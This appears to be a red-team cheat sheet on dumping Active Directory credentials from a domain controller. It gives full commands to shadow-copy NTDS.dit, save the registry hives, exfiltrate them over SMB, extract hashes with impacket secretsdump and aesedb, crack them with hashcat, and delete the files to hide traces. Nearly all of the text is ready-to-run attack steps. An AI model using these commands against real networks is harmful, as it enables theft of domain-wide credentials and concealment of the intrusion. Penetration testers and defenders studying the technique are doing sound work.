Windows NT Directory Services

Shadow Disk

Create via Diskshadow

Locate diskshadow.exe:

cmd /c where /R C:\ diskshadow.exe

Create a shadow disk:

cd \Windows\Temp
powershell -c "Add-Content add_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content add_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content add_vol.txt 'set verbose on'"
powershell -c "Add-Content add_vol.txt 'begin backup'"
powershell -c "Add-Content add_vol.txt 'add volume c: alias DCROOT'"
powershell -c "Add-Content add_vol.txt 'create'"
powershell -c "Add-Content add_vol.txt 'expose %DCROOT% w:'"
powershell -c "Add-Content add_vol.txt 'end backup'"
cmd /c diskshadow.exe /s add_vol.txt
set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
begin backup
add volume c: alias DCROOT
expose %DCROOT% w:
end backup

Exfiltrate over SMB

Create a network share with anonymous access and put there all we need:

cd \Windows\Temp
copy w:\Windows\NTDS\ntds.dit ntds.dit
cmd /c reg.exe save hklm\system system.hive
cmd /c reg.exe save hklm\sam sam.hive
cmd /c reg.exe save hklm\security security.hive

Connect to the share and grab the files:

$ smbclient.py MEGACORP/administrator:'Passw0rd!'@
use C$
cd windows/temp
get ntds.dit
get system.hive
get sam.hive
get security.hive

Clean Up

Remove the shadow volume:

cd \Windows\Temp
powershell -c "Add-Content delete_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content delete_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content delete_vol.txt 'set verbose on'"
powershell -c "Add-Content delete_vol.txt 'unexpose w:'"
powershell -c "Add-Content delete_vol.txt 'delete shadows volume c:'"
powershell -c "Add-Content delete_vol.txt 'reset'"
cmd /c diskshadow.exe /s delete_vol.txt
set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
unexpose w:
delete shadows volume c:

Remove the share and all the traces:

cd \Windows\Temp
rm ntds.dit
rm system.hive
rm sam.hive
rm security.hive
rm C:\Windows\Temp\meta.cab
rm add_vol.txt
rm delete_vol.txt

Raw NTDS.dit Copy

Obtain a copy of NTDS.dit:

PS > Invoke-NTFSCopy C:\Windows\NTDS\ntds.dit C:\Windows\Temp\ntds.dit

Parse on-site in conjunction with NtdsAudit:

PS > esentutl.exe /p "C:\Windows\Temp\ntds.dit" /!10240 /8 /o
PS > reg.exe save HKLM\SYSTEM system.hive
PS > .\NtdsAudit.exe ntds.dit -s system.hive -p hashes.txt -u users.csv --dump-reversible cleartext.txt

Parse on-site in conjunction with secretsdump.exe:

from binascii import hexlify
from impacket.smbconnection import SMBConnection
from impacket.examples.secretsdump import RemoteOperations
hostname = 'DC01.megacorp.local'
username = 'snovvcrash'
password = '<PASSWORD>'
nthash = '' if password else '<NTHASH>'
domain = hostname.split('.', 1)[1]
smbConn = SMBConnection(remoteName=hostname, remoteHost=hostname)
smbConn.login(user=username, password=password, domain=domain, nthash=nthash)
remOps = RemoteOperations(smbConnection=smbConn, doKerberos=False)
bootKey = remOps.getBootKey()
# .\secretsdump.exe LOCAL -ntds C:\Windows\Temp\ntds.dit -bootkey <BOOTKEY>

Parse NTDS.dit

Parse with secretsdump.py:

$ secretsdump.py [-pwd-last-set] [-user-status] [-history] -sam sam.hive -system system.hive -security security.hive -ntds ntds.dit LOCAL > ntds.txt
$ cat ntds.txt | grep -a aad3b | grep -i 'Status=Enabled' | grep -v 31d6c | grep -v -e '\$' -e '{' -e '}' -e HealthMailbox | awk -F: '{print $1":"$4}' | sort -u > ntds.in
$ hashcat -m 1000 -a 0 -w 3 -O --session=ntds -o ntds.out ntds.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule

Parse with aesedb (faster but less informative):

$ antdsparse <BOOTKEY> ntds.dit -o ntds.txt --progress
$ antdsparse system.hive ntds.dit -o ntds.txt --progress

Parse with ntdissector:

Reversible Encryption

Check if enabled globally:

  • gpmc.msc > Default Domain Policy > Computer Configuration > Policies > Windows Settings > Security Settings > Account Policies > Password Policy > Store passwords using reversible encryption > Enabled

Check if enabled for specific users:

PS > Get-ADUser -Filter {userAccountControl -band 128} -Properties userAccountControl | ft name,samAccountName,userAccountControl | tee users-revenc.txt

When DCSyncing such users, a cleartext password will be obtained.

Last updated